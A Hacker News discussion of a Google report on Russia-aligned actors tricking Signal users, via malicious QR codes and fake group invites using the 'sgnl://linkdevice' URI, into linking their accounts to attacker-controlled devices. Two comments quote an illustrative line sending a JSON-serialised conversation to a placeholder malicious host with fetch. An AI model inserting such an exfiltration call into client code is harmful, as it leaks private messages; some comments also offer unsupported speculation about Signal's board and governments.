top | item 43102284

Multiple Russia-aligned threat actors actively targeting Signal Messenger

836 points| karel-3d | 1 year ago |cloud.google.com | reply

289 comments

order
[+] vetrom|1 year ago|reply
Signal (and basically any app) with a linked devices workflow has been risky for awhile now. I touched on this last year (https://news.ycombinator.com/context?id=40303736) when Telegram was trash talking Signal -- and its implementation of linked devices has been problematic for a long time: https://eprint.iacr.org/2021/626.pdf.

I'm only surprised it took this long for an in-the-wild attack to appear in open literature.

It certainly doesn't help that signal themselves have discounted this attack (quoted from the iacr eprint paper):

    "We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
[+] diputsmonro|1 year ago|reply
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.

Thus, engaging on this attack would seem to require hardware access to one of the victims' devices (or some other backdoor), in which case you've already lost.

Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.

[+] inor0gu|1 year ago|reply
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.

Outside of lab settings, the only way to do that is: - (1) you get root access to the user's device - (2) you compromise a recent chat backup

The campaign Google found is akin to phishing, so not as problematic on a technical level. How do you warn someone they might be doing something dangerous in an entire can of worms in Usable Security... but it's gonna become even more relevant for Signal once adding a new linked device will also copy your message history (and last 45 days of attachments).

[+] tomrod|1 year ago|reply
If one doesn't use the linked device feature, does that impact this threat surface?
[+] parhamn|1 year ago|reply
One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.

The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.

You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.

I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

[+] inor0gu|1 year ago|reply
You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicone, through the OS and all the way to how packets are forwarded from you to the person on the other end.

This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.

I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.

A few examples: - certificate transparency logs so your traffic is not MitM'ed - reproducible builds so the binary you get matches the public open source code you expect it does (regardless of its quality) - key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's

[+] BrenBarn|1 year ago|reply
I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)

There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

[+] lmm|1 year ago|reply
> Sometimes it all feels pointless

Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.

[+] redleader55|1 year ago|reply
I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust that confirms beyond doubt the provenience of the entity (phone + os + app) that you interact with.

Android has that and can confirm to a third party if the phone is running for example a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + a Lineage OS(an example) "original" software.

The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

A fully transparent attested artifact, which doesn't involve blind trust in a entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of root of trust of signatures.

All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.

[+] MediumOwl|1 year ago|reply
> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.

The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

[+] solarkraft|1 year ago|reply
> "E2E encryption" really requires the client to be built and verified by the end user

We probably agree that this is infeasible for the vast majority of people.

Luckily reproducible builds somewhat sidestep this in a more practical way.

[+] edgineer|1 year ago|reply
I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

[0] https://github.com/maqp/tfc

[+] aembleton|1 year ago|reply
> "E2E encryption" really requires the client to be built and verified by the end user

But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.

At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

[+] SheinhardtWigCo|1 year ago|reply
It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

[+] untech|1 year ago|reply
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
[+] forkerenok|1 year ago|reply
The article says they phish people into linking adversarial devices to their Signal:

> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]

[+] mmooss|1 year ago|reply
Is this serious?

It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (that they know without additional training).

The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me I would expect someone is working on how to secure them enough that even Russian intelligence doesn't have an effective exploit.

The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.

[+] andreygrehov|1 year ago|reply
Soldiers are not allowed to carry a cell phone.
[+] BrenBarn|1 year ago|reply
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
[+] mmooss|1 year ago|reply
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)

Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.

Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.

[+] 1970-01-01|1 year ago|reply
The good news is the target is targeted for a reason: it's still effective.
[+] josh2600|1 year ago|reply
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.

Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.

This is not a simple conversation.

[+] sunshine-o|1 year ago|reply
> There are many voices which try to tell you that signal is compromised.

But compromised by whom? Russian, US Intelligence? I am really confused.

I just looked quickly on on the Signal Foundation website and the board members, I read things like:

> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.

> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board

> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.

Those type of people sound part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?

> This is not a simple conversation.

I agree

[+] SXX|1 year ago|reply
And Telegram specifically bad here. Using custom crypto on custom protocol and dont have any E2EE by default whatsoever storing everything on server in plain text.
[+] mmooss|1 year ago|reply
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.

I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.

[+] moffkalast|1 year ago|reply
> web scale

I didn't realize anyone still used that term with a straight face.

"MongoDB is web scale, you turn it on and it scales right up."

[+] anotherhue|1 year ago|reply
You can check for unexpected linked devices in the settings menu.
[+] jzb|1 year ago|reply
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
[+] seb1204|1 year ago|reply
Great idea, I'll send you a QR code...
[+] andreygrehov|1 year ago|reply
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.

Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.

[+] dtquad|1 year ago|reply
>signal-confirm[.]site is registered in Ukraine

The WHOIS is usually fake made up data so don't know why you are using that to claim it's registered in Ukraine. Russia is also known to use stolen credentials, SIM cards etc. from their neighbouring countries, including Ukraine, for things like this.

[+] WesolyKubeczek|1 year ago|reply
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.

Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.

[+] nightpool|1 year ago|reply
An unregistered domain can still be an IoC especially when found through e.g. payload analysis.
[+] XorNot|1 year ago|reply
[flagged]
[+] evilfred|1 year ago|reply
"Russia-aligned threat"... so... the US?
[+] advisedwang|1 year ago|reply
Kind of a good sign for signal's security that this is the best Russia has got!
[+] aembleton|1 year ago|reply
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Missing from their recommendations: Install No Script: https://noscript.net/

[+] cassepipe|1 year ago|reply
No Script is a browser extension. Signal is an Android/Ios/Electron app so no
[+] lifeinthevoid|1 year ago|reply
They should add an option to not allow linking additional devices, if that’s feasible.
[+] aussieguy1234|1 year ago|reply
Phone verification is a common method used here.

If somehow, the victims phone provider can be compromised or coerced into cooperating, the government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device.

It's very easily done if the victim is located in an authoritarian county like Russia or Iran, they can simply force the local phone provider to co-operate.

[+] gck1|1 year ago|reply
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.

Ironic, coming from Google. As Android is THE only OS where usage of alphanumeric passwords is nearly impossible, as Android limits the length of a password to arbitrary 16 characters, preventing usage of passphrases.

[+] mppm|1 year ago|reply
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
[+] sharpshadow|1 year ago|reply
“Russia's re-invasion of Ukraine”

Reading this for the first time, what is a “re-invasion”? Do they mean the explained cyber attack as second invasion aka “re-invasion”?

[+] cassepipe|1 year ago|reply
Invasion of Crimea 2014

Re-invasion in February 2022